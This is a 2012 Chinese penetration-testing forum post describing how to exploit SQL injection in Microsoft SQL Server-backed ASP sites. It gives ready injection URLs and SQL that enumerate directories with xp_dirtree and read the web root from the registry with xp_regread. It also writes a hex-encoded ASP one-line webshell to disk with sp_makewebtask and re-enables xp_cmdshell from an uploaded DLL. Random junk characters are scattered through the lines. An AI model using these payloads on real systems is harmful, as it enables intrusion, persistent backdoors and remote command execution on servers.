找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsqlL注入取得网站路径最好的方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2146|回复: 0
打印 上一主题 下一主题

MSsqlL注入取得网站路径最好的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:20:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好,我们exec master..xp_dirtree'd:/test'
: @' d4 g2 t) a; u0 R1 {$ a# C假设我们在test里有两个文件夹test1和test2在test1里又有test3
" I6 \0 E, }4 W, g$ R结果显示( @' w. V2 V( j7 z1 f7 L
2 S, }' o* A4 r$ a' c
subdirectory depth
5 M' r, C6 c! p) a  @test1 1; k5 r& }* ^1 q3 Z5 c
test3 2
8 A+ p, k6 R# _. N* o+ J" stest2 1+ {3 @" b$ V8 `# q5 c/ n3 c+ `' P

7 p1 r6 T: S0 V3 a9 T& r- O哈哈发现没有那个depth就是目录的级数
2 G  b2 |" x7 b/ J! s' Cok了,知道怎么办了吧7 Z: }5 c* |0 M6 f7 C! w% t, Z
) k6 E4 s3 g1 y$ I3 R7 _
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
8 v$ [( O5 _- O- F7 jhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- 4 j. r$ b/ f6 k4 r- U5 \
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-4 v+ E+ u/ Y' ~! @  a

: s, j# K1 W# S; j+ T* `6 {9 y只要加上id=1,就是第一级目录 。+ t* E4 b6 [7 [

' L" [4 {/ y/ J8 O) p. i& @1 T- Q7 \( |! A( [
通过注册表读网站路径:
5 X# k* z' W, V$ m/ Q5 M4 ~) p. T9 l) n" v6 b- J
1.;create table [dbo].[cyfd] ([gyfd][char](255));
. A% ]( j  L! X' b$ i5 }
0 w6 O3 F' n3 W9 D- j& @7 g2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
, s6 t8 D0 H7 v; Eid=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--7 [" d) A3 }# C/ D1 I8 F7 \, |

$ d: x, ^7 O/ s& g* [) Y3.and 1=(select count(*) from 临时表 where 临时字段名>1)
: F: [$ n; g6 X# l  @$ iand 1=(select count(*) from cyfd where gyfd > 1)
: B5 C7 G6 w# q5 N* @$ M这样IE报错,就把刚才插进去的Web路径的值报出来了
% H3 u, H7 u- h7 n6 A. b) C* Z$ h& H6 U: h
4.drop table cyfd;-- 删除临时表' Z2 A2 k# p, s' Q! i, M3 J
. x" ]* d$ c, m8 B2 B  H/ ^
获得webshell方法:) }! J% c* f( V. E! I4 W: z1 Q! n
1.create table cmd (a image)-- \**cmd是创建的临时表
/ Q' K. D4 ]1 \' j& J, n  u* s$ u) q* e
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
! I% S7 v5 ^$ Y. O3 m/ a2 D* r; f8 i0 Z8 |8 m7 Y
- {' P; Y! o9 a$ I6 i
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'7 J( R# v2 u- O
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'0 v% ^1 Y; ^) }  h1 a5 R

* v& `" h: M6 h5 G7 `4.drop table cmd;-- 删除cmd临时表! N% _6 j, h( E- u) E+ W$ e8 b7 ?/ Q

" B# a2 F& z% u7 E2 E; V恢复xp_cmdshell方法之一:- ]. {( G1 ?9 B" ~
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
1 F& i; z& Q( e+ e/ s9 Lhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
- Z2 U9 u3 {# A- Q恢复,支持绝对路径的恢复哦。:)1 `' q, D) k3 L- j# P8 O
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表